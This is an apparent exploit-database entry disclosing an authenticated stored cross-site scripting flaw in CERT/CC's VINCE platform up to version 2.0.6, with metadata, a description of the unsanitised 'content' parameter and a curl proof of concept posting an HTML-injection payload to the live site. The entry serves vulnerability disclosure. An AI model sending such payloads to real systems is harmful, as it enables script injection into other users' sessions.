CMU CERT/CC VINCE 2.0.6 - Stored XSS

Author: LiquidWorm
type: webapps
platform: multiple
port: 
date_added: 2025-04-11 
date_updated: 2025-04-11 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Tile: CMU CERT/CC VINCE 2.0.6 - Stored XSS
# Vendor: Carnegie Mellon University
# Product web page: https://www.kb.cert.org/vince/
# Affected version: <=2.0.6

Summary: VINCE is the Vulnerability Information and Coordination
Environment developed and used by the CERT Coordination Center
to improve coordinated vulnerability disclosure. VINCE is a
Python-based web platform.

Desc: The framework suffers from an authenticated stored
cross-site scripting vulnerability. Input passed to the
'content' POST parameter is not properly sanitised before
being returned to the user. This can be exploited to execute
arbitrary HTML/JS code in a user's browser session in context
of an affected site.

Tested on: nginx/1.20.0
           Django 3.2.17


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5917
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5917.php


13.01.2023

--


$ curl -k https://kb.cert.org/vince/comm/post/CASE_NO \
> -H "Cookie: sessionid=xxxx" \
> -d 'content="><marquee>ZSL</marquee>%0A%0A&csrfmiddlewaretoken=xxx&paginate_by=10&reply_to=xxxxx'